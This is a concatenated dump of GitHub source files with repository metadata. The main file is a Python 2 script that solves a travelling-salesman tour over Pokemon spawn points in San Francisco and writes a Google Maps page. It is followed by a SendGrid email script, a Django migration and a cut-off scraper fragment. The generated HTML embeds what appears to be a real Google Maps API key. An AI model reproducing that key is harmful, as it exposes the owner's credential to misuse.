f2b32b89fcf9f512c1edd0444ad43588be454316
|
[] |
no_license
|
gjeusel/opt_graph_EEL857
|
7aed5584d5c9451e58951838d0e576f1fb16b068
|
40f751d2293e3f1d6b8f76e4b5204436fe672cc1
|
refs/heads/master
| 2021-01-20T03:23:36.374544
| 2017-06-20T00:06:20
| 2017-06-20T00:06:20
| 89,538,074
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,024
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, re
reload(sys)
sys.setdefaultencoding('utf8') # problem with encoding
import argparse
import subprocess
import matplotlib
matplotlib.use("Qt4Agg") # enable plt.show() to display
import matplotlib.pyplot as plt
import logging as log
import errno # cf error raised bu os.makedirs
import pandas as pd
import seaborn as sns
import math
import itertools
import numpy as np
import networkx as nx
# import pygraphviz as pgv
import time
##############################################
######## Global variables : ########
# Paths
script_path = os.path.abspath(sys.argv[0])
working_dir_path = os.path.dirname(script_path)
default_csv_dir = working_dir_path+"/data/"
default_result_dir = working_dir_path+"/results/"
default_html_dir = working_dir_path+"/html_generated_by_python/"
# Cmap
from matplotlib.colors import ListedColormap
cmap_OrRd = ListedColormap(sns.color_palette("OrRd", 10).as_hex())
cmap_RdYlBu = ListedColormap(sns.color_palette("RdYlBu", 10).as_hex())
# Some colors
color_green = sns.color_palette('GnBu', 10)[3]
color_blue = sns.color_palette("PuBu", 10)[7]
color_purple = sns.color_palette("PuBu", 10)[2]
color_red = sns.color_palette("OrRd", 10)[6]
##############################################
def compute_dist(lat1, lng1, lat2, lng2):
""" Compute distance in km from lats and lngs. """
#{{{
# cf http://www.movable-type.co.uk/scripts/latlong.html
phi1 = math.radians(lat1)
phi2 = math.radians(lat2)
delta_phi = math.radians(lat2 - lat1)
delta_lambda = math.radians(lng2 - lng1)
a = math.pow(math.sin(delta_phi/2),2) \
+ math.cos(phi1) * math.cos(phi2) * math.pow(math.sin(delta_lambda/2),2)
c = 2 * math.atan2( math.sqrt(a), math.sqrt(1-a))
R = 6371 #[km]
distance = R*c
return distance
#}}}
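# Worked example (a sketch): San Francisco (37.7749, -122.4194) to
# Los Angeles (34.0522, -118.2437) is roughly 559 km great-circle:
# compute_dist(37.7749, -122.4194, 34.0522, -118.2437)  # ~559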
# Function to convert Dataframe in nice colored table :
def render_mpl_table(data, col_width=4.0, row_height=0.625, font_size=14,
header_color='#40466e', row_colors=['#f1f1f2', 'w'], edge_color='w',
bbox=[0.1, 0, 1, 1], header_columns=0,
ax=None, **kwargs):
""" <pandas.DataFrame> to nice table. """
#{{{
import six
if ax is None:
size = (np.array(data.shape[::-1]) + np.array([0, 1])) * np.array([col_width, row_height])
fig, ax = plt.subplots(figsize=size)
ax.axis('off')
mpl_table = ax.table(cellText=data.values, bbox=bbox, rowLabels=data.index, colLabels=data.columns, **kwargs)
mpl_table.auto_set_font_size(False)
mpl_table.set_fontsize(font_size)
for k, cell in six.iteritems(mpl_table._cells):
cell.set_edgecolor(edge_color)
if k[0] == 0 or k[1] < header_columns:
cell.set_text_props(weight='bold', color='w')
cell.set_facecolor(header_color)
else:
cell.set_facecolor(row_colors[k[0]%len(row_colors) ])
return fig, ax
#}}}
class wrapperDataFrame:
"""
- df : <pandas.DataFrame> of all pokemons in the csv
schema : ['s2_id', 's2_token', 'num', name', 'lat', 'lng',
'encounter_ms', 'disppear_ms']
- pok_nml_few : <list of string> containing the pokemon names of interest
- df_few : <pandas.DataFrame> with only pokemons registers of interest
- df_counts (optionally computed) :
<pandas.DataFrame> of pokemons count
schema : ['Pokemon', 'Count']
- df_rarest (optionally computed) :
<pandas.DataFrame> reduced to a % of the rarest
"""
# s2_id and s2_token reference Google's S2 spatial area library.
# num represents pokemon pokedex id
# encounter_ms represents time of scan
# disappear_ms represents time this encountered mon will despawn
#{{{ Methods of wrapperDataFrame
def __init__(self, df_path=default_csv_dir+"pokemon-spawns.csv",
pok_nml_few=["Dragonair"]): #constructor
print "Reading csv ..."
self.df = pd.read_csv(df_path)
self.pok_nml_few = pok_nml_few
print "Constructing df_few with : ", self.pok_nml_few, "..."
self.construct_df_few()
print "Removing spawns out of San Fransisco ..."
self.clean_outofSF()
print "Removing spawns in double ..."
self.clean_spawns_pos_doubles()
def __str__(self):
# print ".df.head() = \n",self.df.loc[:,"num":"lng"].head() , "\n"
# print ".df_counts.tail(10) = \n", self.df_counts.tail(10) , "\n"
# print ".df_rarest.head() = \n", self.df_rarest.loc[:,"num":"lng"].head() , "\n"
print ".df_few = \n", self.df_few.loc[:,"num":"lng"]
return("")
def construct_df_few(self):
#{{{
self.df_few = pd.DataFrame()
for pok_name in self.pok_nml_few:
self.df_few = pd.concat( [self.df_few,
self.df.loc[self.df.loc[:,"name"] == pok_name] ] )
#}}}
def clean_spawns_pos_doubles(self):
""" Remove registers with the same lat AND lnd"""
#{{{
i = 0 ; i_end = self.df_few.shape[0] ;
k_end = self.df_few.shape[0] ;
while (i < i_end):
k = i+1
while (k<k_end):
# print "i=",i, " ; k=", k
bool_lat = self.df_few.iloc[i].loc["lat"] == self.df_few.iloc[k].loc["lat"]
bool_lng = self.df_few.iloc[i].loc["lng"] == self.df_few.iloc[k].loc["lng"]
if (bool_lat and bool_lng):
self.df_few = self.df_few.drop(self.df_few.index[[k]])
i_end = i_end - 1
k_end = k_end - 1
else:
k = k+1
i = i+1
#}}}
def clean_outofSF(self):
""" Keep only registers with 36<lat<38 and -125<lng<-120 """
#{{{
i = 0 ; i_end = self.df_few.shape[0] ;
while (i < i_end):
# print "i=",i"
bool_lat_l = (36 < self.df_few.iloc[i].loc["lat"])
bool_lat_r = (self.df_few.iloc[i].loc["lat"] < 38)
bool_lng_l = (-125 < self.df_few.iloc[i].loc["lng"])
bool_lng_r = (self.df_few.iloc[i].loc["lng"] < -120)
bool_lat = bool_lat_l and bool_lat_r
bool_lng = bool_lng_l and bool_lng_r
if not(bool_lat and bool_lng):
self.df_few = self.df_few.drop(self.df_few.index[[i]])
i_end = i_end - 1
else:
i = i+1
#}}}
def add_adress(self, lat=37.754242, lng=-122.383602):
""" Add register at iloc 0 with your adress.
default : 24th St, San Francisco, CA 94107, États-Unis
"""
#{{{
s2 = pd.Series(['0', 'my_adress', lat, lng], index=['num', 'name', 'lat', 'lng'])
self.df_few.loc[-1] = s2
self.df_few = self.df_few.sort_index()
self.df_few = self.df_few.reset_index()
#}}}
def construct_df_rarest(self, threshold=10):
""" Compute df_rarest with the threshold percents of the rarest. """
#{{{
print "Couting spawns ..."
self.df_counts = (self.df.groupby("name").size().to_frame()
.reset_index(level=0)
.rename(columns={0: "Count", "name": "Pokemon"})
.sort_values(by="Count", ascending=False))
total_count = sum(self.df_counts.Count)
n_last_lines = int(self.df_counts.shape[0]*threshold/100)  # shape[0]: .size would count rows*columns for a DataFrame
counts_reduced = self.df_counts.tail(n_last_lines)
print "Constructing df_rarest ..."
self.df_rarest = self.df.loc[self.df["name"].isin(counts_reduced["Pokemon"])]
#}}}
def plot_spawn_counts(self, ax):
""" barplot of df_rarest """
#{{{
# self argument needed, cf :
# http://sametmax.com/quelques-erreurs-tordues-et-leurs-solutions-en-python/
ax = sns.barplot(x="Pokemon", y="Count", data=self.df_counts, palette="GnBu_d")
ax.set_xlabel("Pokemon")
ax.set_xticklabels(self.df_counts["Pokemon"], rotation=90)
ax.set_ylabel("Number of Spawns")
return(ax)
#}}}
def write_rarest_csv(self, path="./data/", threshold=10):
""" df_rarest to csv with normalized filename. """
#{{{
full_path = path + "pokemon-spawns-" + str(int(threshold*100)) + "%-rarest.csv"
print "Writting" + full_path + " ..."
self.df_rarest.to_csv(full_path, index=False)
#}}}
#}}}
################################################################
#
# Shortest Path algorithms :
#
################################################################
def verify_path(G, list_of_nodes):
""" Function to verify if a path exists in the ordered list_of_nodes.
Remark : it will always be the case with complete graph.
return : bool
"""
#{{{
path_found=True
for i in range(0,len(list_of_nodes)-1):
if not list_of_nodes[i+1] in G.neighbors(list_of_nodes[i]):
path_found=False
return path_found
#}}}
def brute_force(G):
""" brute_force compute all combination of nodes path and get
the shortest.
Verification if the path exists from a list of nodes is used.
"""
#{{{
min_dist = np.inf
num_nodes = G.order()
list_of_nodes = []
opt_list_of_nodes = []
perm_array = np.arange(1, num_nodes)
for tuples in itertools.permutations(perm_array):
list_of_nodes = [0] + list(tuples) + [0]
path_found = verify_path(G, list_of_nodes)
if path_found is False:
continue  # skip invalid orders instead of aborting the whole search
dist = 0
for i in range(len(list_of_nodes)-1):
dist = dist + G[list_of_nodes[i]][list_of_nodes[i+1]]['weight']
if (dist < min_dist):
opt_list_of_nodes = list(list_of_nodes)
min_dist = dist
return min_dist, opt_list_of_nodes
#}}}
def swap(array, n1, n2):
tmp = array[n1]
array[n1] = array[n2]
array[n2] = tmp
return array
def backtrack_defby_rec(G, list_of_nodes, i_node=0, dist_tmp=0,
min_dist=np.inf, opt_list_of_nodes=[]):
""" backtrack_defby_rec : backtrack using verify_path function
for solution viability, and already computed minimal dist
to check if valid solution.
It is a function defined by recurrency, so be carefull with
variables scoops.
"""
#{{{
num_nodes = G.order()-1
# print "----------------------------------------"
# print "backtrack_defby_rec have been called with :"
# print "i_node = ", i_node
# print "min_dist = ", min_dist
# print "dist_tmp = ", dist_tmp
# print "list_of_nodes = ", list_of_nodes
# print "opt_list_of_nodes = ", opt_list_of_nodes
if(i_node == num_nodes):
min_dist = dist_tmp + G[list_of_nodes[num_nodes]][list_of_nodes[0]]['weight']
opt_list_of_nodes = np.append(list_of_nodes, 0)
else:
for i in range(i_node+1, num_nodes+1):
list_of_nodes = swap(list_of_nodes, i_node+1, i)
# Not necessary for complete graph :
path_found = verify_path(G, list_of_nodes)
if path_found is False:
break
# Won't work :
# dist_tmp = dist_tmp + G[list_of_nodes[i_node]][list_of_nodes[i_node+1]]['weight']
# problem with shared memory between calls
new_dist = dist_tmp + G[list_of_nodes[i_node]][list_of_nodes[i_node+1]]['weight']
if (new_dist < min_dist):
min_dist_returned, opt_list_of_nodes_returned = \
backtrack_defby_rec(G, list_of_nodes=list_of_nodes,
i_node=i_node+1,
dist_tmp=new_dist,
min_dist=min_dist,
opt_list_of_nodes=opt_list_of_nodes)
if(min_dist_returned < min_dist):
min_dist = min_dist_returned
opt_list_of_nodes = opt_list_of_nodes_returned
list_of_nodes = swap(list_of_nodes, i_node+1, i)
return(min_dist, opt_list_of_nodes)
#}}}
def list_of_nodes_to_dist(G, list_of_nodes, min_dist):
""" Compute the path's distance from a list_of_nodes belonging to G
list_of_nodes : <list>
"""
#{{{
dist = 0
loop_broken = False
for i in range(len(list_of_nodes)-1):
dist = dist + G[list_of_nodes[i]][list_of_nodes[i+1]]['weight']
if dist > min_dist:
loop_broken = True
break
if loop_broken is True:
return(np.inf)
else:
return(dist)
#}}}
def backtrack(G):
""" backtrack : backtrack using verify_path function
for solution viability, and already computed minimal dist
to check if valid solution.
"""
#{{{
min_dist = np.inf
num_nodes = G.order()
list_of_nodes = []
opt_list_of_nodes = []
perm_array = np.arange(1, num_nodes)
for tuples in itertools.permutations(perm_array):
list_of_nodes = [0] + list(tuples) + [0]
path_found = verify_path(G, list_of_nodes)
if path_found is False:
continue  # skip invalid orders instead of aborting the whole search
# promissor inside list_of_nodes_to_dist function
dist = list_of_nodes_to_dist(G, list_of_nodes, min_dist)
if dist < min_dist:
min_dist = dist
opt_list_of_nodes = list(list_of_nodes)
return min_dist, opt_list_of_nodes
#}}}
def branch_and_bound(G):
min_dist = np.inf
num_nodes = G.order()
list_of_nodes = []
opt_list_of_nodes = []
# Choice: subsets are possible paths with the second node already chosen
for i in np.arange(1, num_nodes):
perm_array = np.arange(1, num_nodes)
perm_array = np.delete(perm_array, i - 1)  # np.delete returns a copy; value i sits at index i-1
for tuples in itertools.permutations(perm_array):
list_of_nodes = [0, i] + list(tuples) + [0]
path_found = verify_path(G, list_of_nodes)
if path_found is False:
continue  # skip invalid orders instead of aborting the whole search
# promissor inside list_of_nodes_to_dist function
dist = list_of_nodes_to_dist(G, list_of_nodes, min_dist)
if dist < min_dist:
min_dist = dist
opt_list_of_nodes = list_of_nodes
return min_dist, opt_list_of_nodes
def smallest_edge(G, idx_nodes_used, idx_node):
# idx_node is the index of the node considered in left_in_LoN
num_nodes = G.order()
min_dist = np.inf
for k in range(0, num_nodes):
if not(k in idx_nodes_used):
dist_tmp = G[idx_node][k]['weight']
if dist_tmp < min_dist:
min_dist = dist_tmp
idx_next_node = k
return idx_next_node, min_dist
# Strategy used : always choose the shortest edge
def heuristic_shortest_edge(G, idx_first_node = 0):
num_nodes = G.order()-1
dist_path = 0
idx_nodes_used = [idx_first_node]
idx_current_node = idx_first_node
while (len(idx_nodes_used)-1 < num_nodes):
# finding smallest edge :
idx_next_node, min_dist_edge = smallest_edge(G,
idx_nodes_used = idx_nodes_used,
idx_node = idx_current_node)
# Update values :
dist_path = dist_path + min_dist_edge
idx_nodes_used.append(idx_next_node)
idx_current_node = idx_next_node
# Add distance to close the cycle :
dist_path = dist_path + G[idx_first_node][idx_next_node]['weight']
idx_nodes_used.append(idx_first_node)
return dist_path, idx_nodes_used
def heuristic_neighboors(G, idx_first_node = 0):
""" Heuristic greedy with permutations tests in the neighbors. """
num_nodes = G.order()
dist = 0
min_dist, opt_list_of_nodes = heuristic_shortest_edge(G)
list_of_nodes = list(opt_list_of_nodes) #copy
for i in range(1, num_nodes):
for j in [x for x in range(1, num_nodes) if x != i]:
list_of_nodes = swap(list_of_nodes, i,j)
path_found = verify_path(G, list_of_nodes)
if path_found is False:
list_of_nodes = swap(list_of_nodes, i, j)  # undo the swap before skipping this order
continue
dist = list_of_nodes_to_dist(G, list_of_nodes, min_dist)
if dist < min_dist :
min_dist = dist
opt_list_of_nodes = list(list_of_nodes) #copy
list_of_nodes = swap(list_of_nodes, i,j)
return(min_dist, opt_list_of_nodes)
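# A tiny sanity check (a sketch; the 4-node metric below is arbitrary):
# import networkx as nx
# G = nx.complete_graph(4)
# for u, v in G.edges():
#     G[u][v]['weight'] = abs(u - v)
# print brute_force(G)              # optimal cycle cost and node order
# print heuristic_shortest_edge(G)  # greedy tour; may be longer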
# Class wrappers for resolution methods :
class graphWrapper:
"""
- G : NetworkX graph
node_scheme = ['num', 'name', 'lat', 'lng']
edge : weight=dist, label=dist+"km"
- df_scores : <pandas.DataFrame> of execution time and results
obtained by shortest path algos
schema = [ 'Algo', 'Execution Time [s]', 'Shortest Path [km]',
'List of nodes ordered']
"""
#{{{ Methods of graphWrapper
def __init__(self, df): #constructor
print "Constructing NetworkX Graph ..."
self.df_to_nx_complete(df)
# Initialize df_scores :
self.df_scores = pd.DataFrame(columns=['Execution Time [s]',
'Shortest Path [km]', 'List of nodes ordered'])
def df_to_nx_complete(self, df):
""" Construct <networkx.classes.graph.Graph> from
<pandas.DataFrame> as a complete graph ('as the crow flies').
"""
#{{{
n = df.shape[0]
self.G = nx.complete_graph(0)
for i in range(0,n):
self.G.add_node(i, \
num=df.iloc[i].loc["num"], \
name=df.iloc[i].loc["name"], \
lat=df.iloc[i].loc["lat"], \
lng=df.iloc[i].loc["lng"] \
)
for i in range(0,n-1):
for j in range(i+1,n):
dist = compute_dist(self.G.node[i]["lat"], self.G.node[i]["lng"], \
self.G.node[j]["lat"], self.G.node[j]["lng"])
dist_trunc_str = str(int(dist)) + "km"
self.G.add_edge(i, j, weight=dist, label=dist_trunc_str)
#}}}
def __str__(self):
""" print method of this class result in the bash cmd display of
an agraph saved as png. """
#{{{
# converting to Agraph :
K_agraph = nx.nx_agraph.to_agraph(self.G)
# Modifying attributes :
palette = sns.color_palette("RdBu", n_colors=7)
K_agraph.graph_attr['label']='San Francisco Dragonair Pop'
K_agraph.graph_attr['fontSize']='12'
K_agraph.graph_attr['fontcolor']='black'
# K_agraph.graph_attr['size']='1120,1120'
# K_agraph.graph_attr.update(colorscheme=palette, ranksep='0.1')
K_agraph.node_attr.update(color='red')
K_agraph.edge_attr.update(color='blue')
# Displaying by saving first and delete at the end
K_agraph.write("tmp.dot")
K_agraph.draw('tmp.png', prog="circo")
command = "display -geometry 1200x720 tmp.png"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
process.wait()
print "Displaying graph process returncode = ", process.returncode
command = "rm tmp.png tmp.dot"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
process.wait()
#}}}
def wrapp_shortest_path(self, algo):
""" add a register to df_scores"""
#{{{
algo_str = re.search('<function (.+?) at', str(algo)).group(1)
print "Computing Shortest Path with " + algo_str + " ..."
start_time = time.time()
if algo_str == 'backtrack_defby_rec':
list_of_nodes = np.arange(self.G.order())
min_dist, opt_LoN = algo(self.G, list_of_nodes)
opt_LoN = list(opt_LoN)
else:
min_dist, opt_LoN = algo(self.G)
end_time = time.time()
total_time = end_time - start_time
self.df_scores.loc[algo_str] = [total_time, min_dist, opt_LoN]
#}}}
def compute_shortest_path(self, algo_nml=
[brute_force, backtrack, backtrack_defby_rec, heuristic_shortest_edge]):
""" Compute Shortest Paths using algos in algo_nml. """
for e in algo_nml:
self.wrapp_shortest_path(e)
def display_scores(self):
fig, ax = render_mpl_table(self.df_scores, header_color=color_blue,
row_colors=['w', 'w'], edge_color='w')
return fig, ax
#}}}
def write_pok_gmap_loc(dfs,
pathname=working_dir_path+"/html_generated_by_python/"):
""" Experimentation of vizualization using GoogleMap API. """
#{{{
fout = pathname + '-'.join(dfs.pok_nml_few).lower() + "-locations.txt"
print "Writting ", fout, " ..."
f = open(fout, 'w')
for i in range(dfs.df_few.shape[0]):
line = dfs.df_few.iloc[i]
tmp = str(line["lat"]) + "," + str(line["lng"]) + "\n"
# print tmp
f.write(tmp)
f.close()
fhtml = pathname + "gmap_" + '-'.join(dfs.pok_nml_few).lower() + ".html"
print "Writting ", fhtml, " ...\n"
f = open(fhtml, 'w')
f.write("""<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="initial-scale=1.0, user-scalable=no">
<meta charset="utf-8">
<title>San Francisco Rare Pokemons Hunt</title>
<style>
/* Always set the map height explicitly to define the size of the div
* element that contains the map. */
#map {
height: 100%;
width: 70%;
}
/* Optional: Makes the sample page fill the window. */
html, body {
height: 100%;
margin: 0;
padding: 0;
}
#right-panel {
font-family: 'Roboto','sans-serif';
line-height: 30px;
padding-left: 10px;
}
#right-panel select, #right-panel input {
font-size: 20px;
}
#right-panel select {
width: 100%;
}
#right-panel i {
font-size: 20px;
}
html, body {
height: 100%;
margin: 0;
padding: 0;
}
#right-panel {
float: right;
width: 28%;
padding-left: 2%;
}
#output {
font-size: 15px;
}
</style>
</head>
<body>
<div id="right-panel">
<div id="inputs">
<pre>
""")
pok_list_str = "" + "var pok_list = [\n"
for i in range(0,dfs.df_few.shape[0]):
tmp_str = " ['" + str(dfs.df_few.iloc[i].loc["name"]) + "', " \
+ str(dfs.df_few.iloc[i].loc["lat"]) + ", " \
+ str(dfs.df_few.iloc[i].loc["lng"]) + ", " \
+ str(i) + "],\n"
pok_list_str = pok_list_str + tmp_str
pok_list_str = pok_list_str + " ];\n"
f.write(pok_list_str)
f.write("""
</pre>
</div>
<div>
<strong>Results</strong>
</div>
<div id="output"></div>
</div>
<div id="map"></div>
<script>
function initMap() {
var map = new google.maps.Map(document.getElementById('map'), {
zoom: 10,
center: {lat: 37.615223, lng: -122.389977},
mapTypeId: 'terrain'
});
var dragonairImage = {
url: 'http://pre00.deviantart.net/73f7/th/pre/i/2013/024/f/5/dragonair_by_darkheroic-d5sizqi.png',
size: new google.maps.Size(70,70),
origin: new google.maps.Point(0, 0),
anchor: new google.maps.Point(0, 0),
scaledSize: new google.maps.Size(60, 60),
labelOrigin: new google.maps.Point(9, 8)
};
var homeImage = {
url: 'http://www.icone-png.com/png/54/53529.png',
size: new google.maps.Size(30,30),
origin: new google.maps.Point(0, 0),
anchor: new google.maps.Point(0, 0),
scaledSize: new google.maps.Size(30, 30),
labelOrigin: new google.maps.Point(-5, 8)
};
var charmeleonImage = {
url: 'http://pokemonbr.net/wp-content/uploads/2016/08/charmeleon.png',
size: new google.maps.Size(50,50),
origin: new google.maps.Point(0, 0),
anchor: new google.maps.Point(0, 0),
scaledSize: new google.maps.Size(50, 50),
labelOrigin: new google.maps.Point(-5, 8)
};
var porygonImage = {
url:'http://vignette2.wikia.nocookie.net/pokemon/images/3/3b/137Porygon_AG_anime.png/revision/latest?cb=20141006025936',
size: new google.maps.Size(50,50),
origin: new google.maps.Point(0, 0),
anchor: new google.maps.Point(0, 0),
scaledSize: new google.maps.Size(50, 50),
labelOrigin: new google.maps.Point(-5, 8)
};
// Shapes define the clickable region of the icon. The type defines an HTML
// <area> element 'poly' which traces out a polygon as a series of X,Y points.
// The final coordinate closes the poly by connecting to the first coordinate.
var shape = {
coords: [0, 0, 0, 50, 50, 50, 50, 0],
type: 'poly'
};
""")
pok_list_str = " " + "var pok_list = [\n"
for i in range(0,dfs.df_few.shape[0]):
tmp_str = " ['" + str(dfs.df_few.iloc[i].loc["name"]) + "', " \
+ str(dfs.df_few.iloc[i].loc["lat"]) + ", " \
+ str(dfs.df_few.iloc[i].loc["lng"]) + ", " \
+ str(i) + "],\n"
pok_list_str = pok_list_str + tmp_str
pok_list_str = pok_list_str + " ];\n"
f.write(pok_list_str)
f.write("""
// Markers :
for (var i = 0; i < pok_list.length; i++) {
var mark = pok_list[i];
if(mark[0]=="Dragonair"){
var icon = dragonairImage;
}
if(mark[0]=="Charmeleon"){
var icon = charmeleonImage;
}
if(mark[0]=="Porygon"){
var icon = porygonImage;
}
if(mark[0]=="my_adress"){
var icon = homeImage;
}
var marker = new google.maps.Marker({
position: {lat: mark[1], lng: mark[2]},
map: map,
icon: icon,
shape: shape,
title: mark[0] + " : " + mark[3],
zIndex: mark[3],
label: {
text: i.toString(),
fontWeight: 'bold',
fontSize: '40px',
fontFamily: '"Courier New", Courier,Monospace',
color: 'black'
}
});
}
var bounds = new google.maps.LatLngBounds; // automate bounds
var dist = '';
var outputDiv = document.getElementById('output');
outputDiv.innerHTML = 'From ----> To ----> distance <br>';
// Distances :
function calcDistance(origin1,destinationB,ref_Callback_calcDistance, k, n){
var service = new google.maps.DistanceMatrixService();
var temp_duration = 0;
var temp_distance = 0;
var testres;
service.getDistanceMatrix(
{
origins: [origin1],
destinations: [destinationB],
travelMode: google.maps.TravelMode.DRIVING,
unitSystem: google.maps.UnitSystem.METRIC,
avoidHighways: false,
avoidTolls: false
}, function(response, status) {
if (status !== google.maps.DistanceMatrixStatus.OK) {
alert('Error was: ' + status);
testres= {"duration":0,"distance":0};
} else {
var originList = response.originAddresses;
var destinationList = response.destinationAddresses;
var showGeocodedAddressOnMap = function (asDestination) {
testres = function (results, status) {
if (status === 'OK') {
map.fitBounds(bounds.extend(results[0].geometry.location));
} else {
alert('Geocode was not successful due to: ' + status);
}
};
};
for (var i = 0; i < originList.length; i++) {
var results = response.rows[i].elements;
for (var j = 0; j < results.length; j++) {
temp_duration+=results[j].duration.text;
temp_distance+=results[j].distance.text;
}
}
testres=[temp_duration,temp_distance];
if(typeof ref_Callback_calcDistance === 'function'){
//calling the callback function
ref_Callback_calcDistance(testres, k, n)
}
}
}
);
}
function Callback_calcDistance(testres, k, n) {
dist = testres[1];
outputDiv.innerHTML += k + ' ----> ' + n + ' ----> ' + dist + '<br>'
console.log(testres[1]);
}
for (var k = 0; k < pok_list.length; k++) {
var origin = new google.maps.LatLng(pok_list[k][1], pok_list[k][2]);
for (var n = 0; n < pok_list.length; n++) {
if (n !== k) {
var dest = new google.maps.LatLng(pok_list[n][1],pok_list[n][2]);
//calling the calcDistance function and passing callback function reference
calcDistance(origin, dest, Callback_calcDistance, k,n);
}
}
}
}
</script>
<script async defer
src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCgu_eNgt-Hiu0HAnZwkIWYcnUoLsGSqVs&callback=initMap">
</script>
</body>
</html>
""")
f.close()
#}}}
def setup_argparser():
""" Define and return the command argument parser. """
#{{{
parser = argparse.ArgumentParser(description='''Graph Optimization Study.''')
parser.add_argument('--show_counts', action='store_true', default=False, dest='show_counts',
help='whether to run counts analysis or not')
parser.add_argument('--adress', action='store', nargs=2, type=float,
default=[37.877875, -122.305926], dest='adress', metavar=('lat', 'lng'),
help='latitude and longitude of the home address')
parser.add_argument('--poks_hunted', default="Dragonair", dest='poks_hunted',
type=str, metavar="'Dragonair, Porygon, ...'",
help="which pokemons to hunt in comma separated list ")
return parser
#}}}
def setup_paths(list_of_paths):
""" Create defaults directories if needed. """
for p in list_of_paths:
try:
os.makedirs(p)
except OSError as exc: # Python >2.5
if exc.errno != errno.EEXIST:
raise
def main():
parser = setup_argparser()
try:
args = parser.parse_args()
except argparse.ArgumentError as exc:
log.exception('Error parsing options.')
parser.error(str(exc.message))
raise
setup_paths([default_result_dir, default_html_dir])
if (args.show_counts): # will only compute count barplot
dfs = wrapperDataFrame()
dfs.construct_df_rarest()
fig, ax = plt.subplots(figsize=(30, 30))
dfs.plot_spawn_counts(ax)
plt.show() # interactive plot
return
# Convert from string to list of string
poks_hunted_list = args.poks_hunted.split(",")
poks_hunted_list = map(str.strip, poks_hunted_list)
dfs = wrapperDataFrame(pok_nml_few = poks_hunted_list)
# from IPython import embed; embed()  # debug leftover; uncomment for an interactive session
# dfs.add_adress(lat=37.877875, lng=-122.305926)
dfs.add_adress(lat=args.adress[0], lng=args.adress[1])
# Generating html file :
write_pok_gmap_loc(dfs)
print dfs
n_poks = dfs.df_few.shape[0]
Gwrap = graphWrapper(dfs.df_few)
# print Gwrap
print "--------------------------------------------"
print "For Graph of n=", n_poks
# Gwrap.wrapp_shortest_path(brute_force)
# Gwrap.compute_shortest_path()
# Preventing brute_force long computation :
# if n_poks < 7 :
# algo_nml = [brute_force, backtrack, backtrack_defby_rec,
# heuristic_shortest_edge, heuristic_neighboors]
# else :
# algo_nml = [backtrack, backtrack_defby_rec,
# heuristic_shortest_edge, heuristic_neighboors]
algo_nml = [brute_force, backtrack, backtrack_defby_rec,
heuristic_shortest_edge, heuristic_neighboors]
Gwrap.compute_shortest_path(algo_nml = algo_nml)
print Gwrap.df_scores
fig, ax = Gwrap.display_scores()
fig.suptitle("Graph Order = " + str(n_poks))
filename = default_result_dir + "table_score_n_poks_" + str(n_poks)
plt.savefig(filename, bbox_inches='tight')
# from IPython import embed; embed() # Enter Ipython
# plt.show() # interactive plot
if __name__ == '__main__':
main()
|
[
"jeusel.guillaume@gmail.com"
] |
jeusel.guillaume@gmail.com
|
cf15dcd2ca3d40597a02c382669e1827c8223f69
|
092eccf44865839781f51ab237d1821b7f5e3e98
|
/fcm.py
|
e69a2a4f7fe74d530ebb618917cc95cdcdc24615
|
[] |
no_license
|
amit-kumar56/Online-result-alert-system
|
27f7945081408085dccbaa03dcf454a39e8ed525
|
e769461540ab1c8b959d4b95245affff9e4427da
|
refs/heads/master
| 2023-08-05T08:22:55.176174
| 2019-11-10T08:29:50
| 2019-11-10T08:29:50
| 220,761,968
| 3
| 0
| null | 2023-07-23T15:23:33
| 2019-11-10T08:27:38
|
HTML
|
UTF-8
|
Python
| false
| false
| 596
|
py
|
import os
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail

# Read the API key from the environment instead of hardcoding a live secret
# in source control (the original embedded the key directly here).
API_KEY = os.environ.get('SENDGRID_API_KEY')
message = Mail(
from_email='amit1004199@gmail.com',
to_emails='amit10041999@gmail.com',
subject='Sending with Twilio SendGrid is Fun',
html_content='<strong>and easy to do anywhere, even with Python</strong>')
try:
sg = SendGridAPIClient(API_KEY)
response = sg.send(message)
print(response.status_code)
print(response.body)
print(response.headers)
except Exception as e:
print(str(e))
|
[
"noreply@github.com"
] |
amit-kumar56.noreply@github.com
|
a6992f4bad90dc92d519975bf9c75e969005b0f3
|
1d14584f0cc5b587dc6da465a36d089a20f778dd
|
/backend/apps/notes/migrations/0002_notes_public.py
|
1a8c61f3a44bf0597e20e7226a46d7f529bae01b
|
[] |
no_license
|
sameerk129/DocShare
|
20163da35412546024c2fc663d3c552ee48607ec
|
97e156313bb0af55af85a21f845bfc3a7b21211b
|
refs/heads/master
| 2020-03-18T14:16:19.501831
| 2018-05-26T22:08:41
| 2018-05-26T22:08:41
| 134,839,430
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 438
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-05-26 05:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notes', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='notes',
name='public',
field=models.BooleanField(default=False),
),
]
|
[
"sameer.k@greyorange.sg"
] |
sameer.k@greyorange.sg
|
bafe4a257c0c6e015913bdce3beef8e2b5485cba
|
24927eac464cdb1bec665f1cb4bfee85728ec5e1
|
/product_parser/valentino.py
|
4e82a6c7fc7534ee0a25943591dcb384efe6e842
|
[] |
no_license
|
yingl/fashion-spider
|
d72ea8dfd4a49270fd3e64e7a507d6fcbaaf492c
|
0698768cd21d509ec335d7202a753be4f6ad378b
|
refs/heads/master
| 2021-01-01T18:14:17.848732
| 2017-09-27T08:44:47
| 2017-09-27T08:44:47
| 98,282,505
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,336
|
py
|
""" Valentino """
# coding: utf-8
import sys
sys.path.append('../')
import util
BRAND = 'valentino'
PREFIXES = ['www.valentino.cn']
def get_title(driver):
title = ''
element = util.find_element_by_css_selector(driver, 'div.item-info > h1 > div.title > span.value')
if not element:
raise Exception('Title not found for %s' % driver.current_url)
else:
title = element.text.strip()
return title
def get_code(driver):
code = ''
element = util.find_element_by_css_selector(driver, 'span.inner.modelName')
if element:
code = element.text.strip()
return code
def get_price(driver):
price = 0
text = ''
